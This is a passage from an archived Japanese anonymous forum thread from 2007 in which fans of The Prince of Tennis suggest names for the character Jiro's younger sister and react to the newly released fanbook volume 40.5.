(ジロー妹に限らず、樺地妹でも向日姉でも忍足姉でもいいけど)
最近この手の名前減ってきたから、ちょっと珍しい感じでいいかも。

125 :名無しかわいいよ名無し:2007/11/30(金) 00:16:47 ID:EzgDeu7o
順子とかどうだ?

126 :名無しかわいいよ名無し:2007/11/30(金) 00:57:56 ID:paGK+6gn
慈郎同様三人目を匂わせる名前やもしれない。

127 :名無しかわいいよ名無し:2007/11/30(金) 17:19:48 ID:iMkzuIOt
美津子?

128 :名無しかわいいよ名無し:2007/11/30(金) 22:15:53 ID:3i1+NRr1
美以子でミーコとか

129 :名無しかわいいよ名無し:2007/12/01(土) 00:12:25 ID:KkPwaPKU
みーこいいなみーこw

130 :名無しかわいいよ名無し:2007/12/01(土) 01:01:16 ID:aW579G9E
ミーコ可愛いねw
小学低学年位なのかなジローの妹

131 :名無しかわいいよ名無し:2007/12/01(土) 03:06:33 ID:f/8LGlQ9
40.5巻では家族の名前までは判明しないだろうな
たしけ50.5巻ではシクヨロ!
みーこで頼むよ。もう愛着が沸いてしまったw

132 :名無しかわいいよ名無し:2007/12/02(日) 00:50:14 ID:qWu3aE99
ageとくよ(*゚∀゚)

133 :名無しかわいいよ名無し:2007/12/03(月) 02:19:08 ID:TZJRUcgj
ジローのキャラソンやっぱいいなあ…

134 :名無しかわいいよ名無し:2007/12/04(火) 10:21:11 ID:1W+a4Z0u
40.5買った
じろの特技わろたw

135 :名無しかわいいよ名無し:2007/12/04(火) 15:04:30 ID:DnWWwowb
40.5巻、ジローの持ち物検査あった!

136 :名無しかわいいよ名無し:2007/12/04(火) 15:41:54 ID:n/Jk3mSs
まじでか!早く読みたい!!!

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)